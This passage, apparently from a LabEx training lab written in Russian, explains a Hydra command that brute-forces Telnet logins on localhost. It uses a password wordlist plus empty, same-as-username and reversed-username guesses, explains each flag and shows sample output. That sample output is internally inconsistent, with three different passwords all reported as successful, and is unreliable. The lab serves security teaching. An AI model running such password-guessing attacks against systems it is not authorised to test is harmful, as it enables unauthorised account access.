Запуск Hydra с опцией -e nsr
:
Откройте терминал в директории ~/project
и выполните следующую команду:
hydra -l labex -P /usr/share/wordlists/metasploit/unix_passwords.txt -vV -e nsr telnet://localhost
Разберем эту команду по частям:
hydra
: Команда для запуска инструмента Hydra.
-l labex
: Указывает имя пользователя, которое нужно попробовать. Мы используем labex
, стандартного пользователя на виртуальной машине LabEx.
-P /usr/share/wordlists/metasploit/unix_passwords.txt
: Указывает файл со списком паролей. Этот файл содержит список распространенных паролей.
-vV
: Включает подробный режим, показывающий каждую попытку входа.
-e nsr
: Это ключевая опция для этого этапа. Она сообщает Hydra попробовать:
n
: Пустой пароль (пустая строка).
s
: Имя пользователя в качестве пароля.
r
: Перевернутое имя пользователя в качестве пароля.
telnet://localhost
: Указывает целевую службу и адрес. telnet
обозначает протокол Telnet, а localhost
- локальную машину.
Теперь Hydra попытается войти в Telnet-сервис, используя указанное имя пользователя и список паролей, а также пустой пароль, имя пользователя и перевернутое имя пользователя. Вывод будет показывать каждую попытку входа и результат ее выполнения.
Пример вывода (может отличаться в зависимости от списка паролей):
Hydra v9.1 (c) 2020 by van Hauser/THC - use allowed only for legal purposes.
Hydra is starting...
[DATA] 1 task, 1 server, 1337 service(s)
[DATA] attacking service telnet on port 23
[DATA] attacking target localhost
[ATTEMPT] target localhost - login: 'labex' - pass: ''
[23][telnet] host: localhost login: labex password:
[ATTEMPT] target localhost - login: 'labex' - pass: 'labex'
[23][telnet] host: localhost login: labex password: labex
[ATTEMPT] target localhost - login: 'labex' - pass: 'xebal'
[23][telnet] host: localhost login: labex password: xebal
...
Поскольку мы настроили Telnet для разрешения входа без аутентификации, Hydra, скорее всего, найдет успешный вход с пустым паролем.